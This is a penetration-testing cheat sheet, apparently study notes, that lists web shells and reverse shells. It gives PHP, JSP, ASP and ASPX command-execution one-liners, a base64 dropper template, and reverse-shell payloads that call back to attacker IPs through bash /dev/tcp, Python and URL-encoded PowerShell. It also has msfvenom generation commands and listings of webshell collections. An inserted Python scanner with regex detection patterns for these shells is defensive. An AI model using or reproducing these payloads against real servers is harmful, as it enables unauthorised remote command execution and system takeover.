References
Bind and Reverse Shell Tools
Onelin3r
pip install one-lin3r
LazyShell
Webroot
Web Server Default Webroot
Custom shells
PHP
Linux
<?php system($_REQUEST['cmd']); ?>
http://SERVER_IP:PORT/uploads/shell.php?cmd=id
<?php system($_GET['cmd']); ?>
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
Windows
<?php echo exec($_GET["cmd"]); ?>
Reverse shell - Linux
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>
php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
With Base64: decode the embedded payload, change the IP and PORT, re-encode it, and put the new string back into the dropper (the page's original encoded payload is not reproduced here; replace the placeholder).
<!DOCTYPE html><html><head><title>PHP Code with HTML</title></head><body><?php $tem1 = base64_decode("<BASE64_ENCODED_PAYLOAD>"); $file = fopen("php1.php", "w"); echo fwrite($file, $tem1); fclose($file); ?></body></html>
Ref: https://x.com/bountywriteups/status/1844330355450331235?t=mPxG2Tz49KPkkRSK6fIoXA&s=03
Or upload a simple command shell and pass a reverse-shell one-liner through its cmd parameter, for example:
Bind and Reverse Shell
10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
With PowerShell (Windows)
?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27<IP>%27%2C<PORT>%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
ASP
<% eval request('cmd') %>
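As an added example (not from the original page), a small Python scanner for the defender's side of this section: it flags files in a web root that contain the PHP, JSP and ASP one-liner patterns quoted above, which is the kind of check an upload directory should be swept with. The file contents below are constructed samples, and a benign script is included to show it is not flagged.

```python
import re

# Constructed sample files: the one-liners quoted on this page plus one benign script.
SAMPLE_FILES = {
    "uploads/shell.php": "<?php system($_REQUEST['cmd']); ?>",
    "uploads/blank.php.png": "<?php echo exec($_GET[\"cmd\"]);?>",
    "uploads/rev.php": "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'\"); ?>",
    "uploads/drop.html": '<?php $t = base64_decode("QUJD"); $f = fopen("php1.php", "w"); fwrite($f, $t); ?>',
    "app/cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "app/shell.asp": "<% eval request('cmd') %>",
    "app/index.php": "<?php echo htmlspecialchars($_GET['name'] ?? 'guest'); ?>",  # benign
}

# Each rule: (label, compiled regex). The patterns mirror the shells listed on this page.
RULES = [
    ("php-exec-from-request",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b", re.I)),
    ("php-reverse-shell",
     re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+|fsockopen\s*\(", re.I)),
    ("php-base64-dropper",
     re.compile(r"base64_decode\s*\(.*\bf(open|write)\s*\(", re.I | re.S)),
    ("jsp-runtime-exec",
     re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I)),
    ("asp-eval-request",
     re.compile(r"\beval\s*\(?\s*request\s*\(", re.I)),
]


def scan_file(content: str) -> list[str]:
    """Return the labels of every rule that matches this file's content."""
    return [label for label, rx in RULES if rx.search(content)]


def scan_webroot(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan a mapping of path -> content; return only the files that hit at least one rule."""
    hits = {}
    for path, content in files.items():
        labels = scan_file(content)
        if labels:
            hits[path] = labels
    return hits


if __name__ == "__main__":
    for path, labels in scan_webroot(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(labels)}")
```

On a real host, replace SAMPLE_FILES with the contents read from the web root (including files whose extension does not end in .php, as the blank.php.png case above shows).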
With msfvenom
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
Webshells collection
SecLists Webshells
ls /opt/seclists/Web-Shells/
backdoor_list.txt CFM FuzzDB JSP laudanum-1.0 Magento PHP Vtiger WordPress
Laudanum repo
cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx .
PHP
[Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php
/opt/seclists/Web-Shells/FuzzDB/cmd.php
[Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php
/opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php
/opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php
/opt/seclists/Web-Shells/WordPress/plugin-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/php/shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php
/opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php
<?php system($_REQUEST["cmd"]); ?>
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
?cmd=id
curl http://SERVER_IP:PORT/shell.php?cmd=id
p0wny shell
Automates the bypass of PHP function restrictions (system, etc.)
Works on Linux and Windows
PHPBash
wwwolf's PHP web shell
C99 Webshell
PentestMonkey - Reverse shell
JSP
[Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp
/opt/seclists/Web-Shells/FuzzDB/cmd.jsp
/opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp
/opt/tools/SSRFmap/data/cmd.jsp
/opt/tools/clusterd/src/lib/resources/cmd.jsp
[Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp
/opt/seclists/Web-Shells/JSP/simple-shell.jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP
[Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp
/opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp
<% eval request("cmd") %>
ASPX
[Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx
/opt/seclists/Web-Shells/FuzzDB/cmd.aspx
[Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx
/opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx
Metasploit
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2819 bytes
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.5:1337
Antak WebShell
Modify the shell for use
SharPyShell - Tiny and obfuscated ASP.NET webshell
python3 SharPyShell.py generate -p somepassword
python3 SharPyShell.py interact -u <http://target.url/sharpyshell.aspx> -p somepassword
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
msf6 exploit(multi/handler)
Tomcat (8080)
Shell ++
TTY Upgrade